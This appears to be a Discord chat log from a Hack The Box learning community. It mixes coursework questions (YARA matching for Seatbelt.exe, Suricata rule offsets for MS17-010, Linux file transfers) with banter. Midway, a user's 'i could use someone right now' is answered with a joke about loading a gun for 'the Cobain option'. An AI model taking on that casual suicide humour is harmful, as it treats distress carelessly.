The "C:\Rules\yara\seatbelt.yar" YARA rule aims to detect instances of the "Seatbelt.exe" .NET assembly on disk. Analyze both "C:\Rules\yara\seatbelt.yar" and "C:\Samples\YARASigma\Seatbelt.exe" and specify the appropriate string inside the "$class2" variable so that the rule successfully identifies "C:\Samples\YARASigma\Seatbelt.exe". Answer format: L________r

I have checked and was thinking i could find it in HxD but that didnt help
I tried to do grep ^L.*r$ but that dont work in powershell and i tried with Select-String '^L.*r$' .\Seatbelt.exe and got the asnwer Lr☻�☺��JR
on the line 9226 but I cant find it again without the errors help please

Ah I saw your error, I had that error when I put the wrong IP, so yeah, maybe technical issue with the platform

10.10.14.18 is their tun0 ip

file transfers module--> does the first question in linux file transfers methods make sense? the question is: Download the file flag.txt from the web root using Python from the Pwnbox. Submit the contents of the file as your answer.
So am I supposed to download the file via python code even if it is not part of the section?

I think the question is not appropriate for that section and there might be a mistake... retrieving the file via curl or wget works anyway...

Working with IDS and IPS - Suricata Rule Development 1
In the /home/htb-student directory of this section's target, there is a file called local.rules. Within this file, there is a rule with sid 2024217, which is associated with the MS17-010 exploit. Additionally, there is a PCAP file named eternalblue.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to MS17-010. What is the minimum offset value that can be set to trigger an alert?

does anyone have any idea what exactly do they mean by the minimum offset value that triggers an alert

They want you to learn different methods, maybe one day Python is the only thing you will really have available.

you didn't understand what I said. Retrieving files via python code is part of the next section

nvm I just wanted to report that the question is not appropriate for the specific section "Linux file transfers"

Hello, just a quick question. I have installed HTB's Parrot OS VM and I'm going through the login brute forcing module but the VM does not have the /opt/useful/SecLists Did I do something wrong as I thought the VM was a clone of the web pwnbox

It's a pretty close copy, but not 100% - you can find those lists here https://github.com/danielmiessler/SecLists

Thank you for the help

No worries 🙂

it should be in /usr/share by default if im not mistaken

or maybe thats kali

Help please. How do i search for L____r in powershell without errors? When I do the string command I don’t get error but I get error when I do select-string

I will have a look there, I think thats just normal Kali tho

Yeah buts thats from the example, wich i was confused about

Think about what webroot means, it makes perfect sense

Sometimes you can be assigned the ip from the example

how much time do yall spend in HTB?

Per day?

on the main platform or academy

anywhere
im kinda curious if i should up game

i've been doing the seasonal boxes so i guess 8 hours on those

damn

for academy, when i was doing my CDSA cert, i took every moment time i had off during college to do the coursework

I mean you shouldn't compare your hours to other peoples, people have different circumstances and can allocate more or less time than other people

I work full time and I try to do like 4-6 hours a day

to be straight up, generally speaking you do as much time as is good for you so you don't burn out.
I'll do an hour every day, maybe more if I'm feeling it because I got some thinking problems rn.

but if I feel tired I take a break and do less

makes sense
just felt i was doing too little in a way
especially since im a beginner

some people are machines, some people ain't that's just how it is

do what you feel is adequate. if you feel like you're working at a pace where you can understand the content the easiest, then you're doing just fine

ofc
thank you

Just like anything in life you have to pave your way

we all started out at square one. just keep at it, and you'll eventually become better

ye, I think what's most important is that you know you're at a pace where you're not just reading/doing the content but you also fully understand what's going on.
the moment you're kinda just drifting through you might want to consider a break

alright good to know

thank you

i feel like im gonna forget some things and thats stressing me
even though i can just go back and take a look at them again

I think that's kinda natural tbh, I re-read a few things but I get the gist pretty quickly since I absorbed it pretty well first time around.
There's a page on filtering with a bunch of fresh commands and I p much just went back to my terminal, cat pword.txt and input all the commands as a refresher to solidify it to memory

like rn look
" Using the skills acquired in this and previous sections, access the target host and search for the file named 'waldo.txt'. Submit the flag found within the file."

RAAAAHHH

oh nvm
not sure why that scared me

But to be clear putting the attack host ip here is correct right?

Yes

Take notes

shit i forgot again

thanks for the reminder lol

I'm eventually gonna index my notes in obsidian with backlinks and such to clarify context or basic syntax

o

i'm gonna get in on note taking as well so I don't have to backpeddle into pages for commands I forget 😬

yeah fr

Hi

How are you

yo waddup, you may do better with general conversation in the #general channel

It do not open

Read and follow #welcome to gain access

It mostly saves time from scouring the entirety of the modules for one command

I cant stress enough how.important notes are or even doing a "writeup" on how you did a medium lab etc.

I don't know how

I am begginer

Keeping track of your mindset and how you tackle problems helps you understand how to tackle similar problems

Read the section of welcome labeled "verification"

TAKE NOTES

🗿

hacks into your computer and takes your notes

not if they are on paper

dude the wifi is so bad
the terminal wont even type in

I am phone🤣

bro might be Marcus from watch dogs

Ok? You can create an htb account on mobile

I don't know any thing in discord

Last time open it from 2 years

Or more

Well this server revolves around the hackthebox website and their various platforms brother

click #welcome to go to #welcome

Are you girl🗿

If you aren't interested in cybersecurity, this server isn't for you

And what

Only on days that end in y

i love how he completely ignored whatever you said

you can read what this server is

and straight up asked if you are a girl xd

I love hackingto hack people and He threaten

Cringe people are gonna be cringe

let him cook chat

Then you know at a minimum how to maybe read

I am arabic

To invoke ancient Magic

sigma

https://tenor.com/view/tolarian-community-college-kyle-hill-magic-the-gathering-i-hate-your-deck-reading-the-card-gif-22381436

And my language in eng is 30 over 100

ah quick question to view a txt file through cmd
you just type in the full txt name right?

🤣🤍

cat wont work

yes

Depends

What means

I know in eng

windows

Windows = type <file>.txt

A b c d e f g k I j k l m n p q r s t u v w x y z🤣

o

Or iirc Get-FileContent in Powershell

yeah fucking internet dude

What are talking and doing

talking about hacking banks

Just give it a sec and try type waldo.txt

I didn't understand anything🗿

nah nah its been like this since like your reply to my "TAKE NOTES"

if you want to chat with people about general stuff, verify your account in #welcome and go to #general

thats why youre here
to learn

are you using pwnbox or your own vm?

Sigma

ctrl c wont even work holy shit

Ok

own vm
and both have the same problem

Oof

i mean it makes sense
since we get wifi from our neighbour

Big skibidi Ohio moment

wireless isn't stable, especially going through walls with distance

yeah we havent paid our own connection yet

I want someone necessary.

I'm gonna assume with consent here

¯_(ツ)_/¯

😈

What does this even mean

ye ofc

¯_(ツ)_/¯

بدي شغله ضرورية

😕

#rules , English only server brother

I want some one

Sup g0b, enjoying the Sunday?

In message

Don't we all

i could use someone right now..

You told me what it mean

I need to finish my uni work

https://tenor.com/view/hug-warm-hug-depressed-hug-gif-4585064738068342394

thank you

All good man, just chilling 🙂 How're you?

Loading the gun rn, you wanted the Cobain option yeah?

i'm not cultured enough to know who kurt cobain is

Hating executive dysfunction rn, need to do uni work but like brain doesn't wanna focus

I talk you in message

He took a hit off a shotgun,

No

ouch

It is take from your time 30sec

The answer is still: no

No you

🙂

If you a girl I am a boy

wut

lmao

???

It still 30sec

I'm sure g0b can help you understand the steps in #welcome to verify

I don't want any seconds with you

The message request though was funny, not gonna share here

Language barriers and all that

@rapid citrus all are welcome here, follow the steps in #welcome to access the wider server, but please keep discussions on topic and follow #rules - I'll un-mute in 5 minutes

they told me "fuck you" for not wanting to dm, its joever

damn

now be a good boy and behave

(not in a kinky way)

Bruh

aw he left?

Im a girl

What

oh nvm

LMAOO

@ocean night I don't think your mute worked

They're timed out

it did but little time

Anyway

i saw the unmute in realtime

Networking concepts are fun

ACK

so i believe the Setting Up module suggests a couple different distros for pentesting and one of them was BlackArch

Having my first day at a job tmrw

and i'm trying to install that right now but it's kind of pissing me off

they sound fun
but im not sure
im still like 50% through the information security path

arch
spending more time setting up the distro than learning anything

It pisses everyone off

ooo sounds fun

"would you like to install X11 / window manager?" yes

"NOOB NOOB NOOB NOOB NOOB NOOB"

Hope it goes well for you! Just remember to breath, listen and nod in the right places 😉

And spend their training budget :)

🐇 breathe in the right places

cybersecurity job?or something else

Corpa

then i finish installing, reboot, and i'm told there's no OS installed

tyty. I hope i dont mix those 3 up

Happy for you, enjoy it!

Cloud eng. Will still get my ctps cert done, after that they said they paying for cloud certs etc

Breathing is for nerds

ooo alright soudns interesting

remember to breathe from the head, listen from the eyes, and nod with your ears

Sounds like fun!

What is the focus gonna be on? AWS? Google Cloud? Or just in general

Iirc comptia has a cloud cert 🤢

I have it, it's shit.

They doing in azure everything. And for their customers. So mostly automating scripts for it. And work in flows a bit aswell

Ah so the Microsoft AAD certs

Sounds fun!

ah comptia

Listen as long as you're not paying for it

Anyway we've derailed the topic

Wait, there was a topic?

The other 50% is ez

I have not yet checked the certs out what they offer/learn, which are good. And yea job paying for them lol thank god.
Ah shot its not general mbmvm

This has turned in to general lol

Quick rename it to general

Don't tempt me Frodo

If #general is so good, why is there no #general-2

i mean yeah im not gonna lie these look hella interesting

[Please no, I can only handle so much brain rot in a day]

Intro to AD is the best module in the infosec path

only because it's AD

Marcie.. got a message from that person too.. apparently I'm attacking them because they're a girl

Am I cancelled? 😦

Brb let me call you out on twitter

https://tenor.com/view/always-has-been-among-us-astronaut-space-betrayal-gif-23836476

Very much sad

R.I.P g0b career

Time to go make a twitlonger and break out the Ukelele

well if i'm a girl then he's a boy

simple as that

his logic, not mine

¯_(ツ)_/¯

Partly language barrier. Mostly entitlement

Man I wish you could collapse the member groups in the list of members in channel

I havent seen member list since the big UI change

Idk how to access it lol. And on computer its like worst. Cant search/filter...

You on web client?

or desktop

Currently? On mobile. But other then that desktop client

Desktop has it literally on the right hand side, at least for me

Is that mod privs? 😆

Yea on computer yea. But on mobile it used to have it if you swiped right